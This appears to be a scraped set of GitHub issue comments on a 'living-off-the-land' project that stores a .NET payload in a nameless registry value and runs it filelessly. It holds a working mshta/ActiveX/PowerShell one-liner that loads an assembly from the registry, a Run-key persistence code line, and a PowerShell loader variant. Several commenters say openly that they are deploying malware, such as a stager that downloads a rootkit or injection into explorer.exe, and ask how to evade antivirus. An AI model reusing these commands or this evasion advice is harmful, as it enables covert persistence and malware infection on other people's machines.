bytecode77 / living-off-the-land Goto Github PK

Trojan:MSIL/AgentTesla.JMX!MTB

amsi: \Device\HarddiskVolume2\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshtA "JAvascRIPt:close(new ActiveXObject('WSc'+'riPT'+'.ShE'+'ll').run('pOwE'+'rSH'+'ELl \"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\\\"SOFTwArE\\\").GetValue($null)).EntryPoint.Invoke(0,$nuLL)\"',0))"

windows defender won't run it, is there any alternative?
you have a lot of less options trying to run fileless..

Hey,

I saw this line in LivingOffTheLand.cpp

"if (!nt_cpp::SetValue(nt_cpp::GetCurrentUserPath() + L"\Software\Microsoft\Windows\CurrentVersion\Run\\0X", nt_cpp::Udc(startupCommand))) return 0;"

And it seems that some data is stored in the registry key in the Run folder. But when I try to find the data, there is indeed a key withtout name or data in it. How is it possible? How can we check this value?

Do you think AV can detect this key?

I want to be able to run two instance in the same computer, and I know fore sure that the malware can be stored in just another path than Internet Explorer, but how is it possible to start 2 instance at bootup?

Thank again for your support, light me friend!

Hi. nice code! But I am just wondering how am I supposed to insert a payload into registry when it's way over the size limit? in the example I think you used MessageBoxA to call the native API. but what if I want to let's say download the bytes and injected it into explorer.exe process which means this might include multiple API calls? Please correct me if I am wrong on that. The only solution I can think of is that to create more registry keys and store them separately?

Would you be kind enough to show an example of the UI issues in regedit from the null byte key?

Hi,

I understood the payload project was the project executed, but is it possible to explain more how to set our own project?

Is a way to just add our executable?

Is there any action or characteristics that might reveal the executable?

BR and excellent work

Seems like this is patched in Windows 11, calling run() from WScript.Shell results in Access is denied.

Edit: Why do we have to use mshta anyways? Can't we just directly spawn a Powershell process?

Edit 2: Oh look at that it's also issue #11, lol.

Hi,

Thank for your work, it's working perfectly for me, but the issue I have right now is that I have one exe that is a stager, but it supposed to start the rootkit that it downloaded before, but it gets blocked by AV.

It seems quite normal to me, because it was my stager that was starting another exe, but I could not figure a solution for me.

Can you help me?

Hi,

I ran the Living off the Land exe, and make sure there is the message "could not display value" when seeing the registry.
When I run the removaltool, it say that it was removed successfully, so it seem to work.

Besides that, I know for sure that the Living off the land exe did not work because the stager did not run (he's supposed to download the rootkit files).

Does I use something wrong? Does it work on your system?
I use a Windows VM, and I have an hard time trying to just make program run at bootup, so maybe it comes from there..

BR

my version of visual studio 2019 is giving an error when downloading the project. when I downloaded it by git clone the project gave a compilation error.

Hi,

I decided that the form of my malware should be a dll because it's not known by AV. In windows, we can use the command rundll32 to run it.

I could try to start a batch maybe? I understood that the living off the land executable loaded the content of the payload?

i'm trying to execute the payload that hides inside a registry key but it cannot, here's what i'm trying:

powershell -Command [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("Software\Microsoft\Internet Explorer").GetValue($Null)).EntryPoint.Invoke(0,$Null)

it gives me : You cannot call a method on a null-valued expression.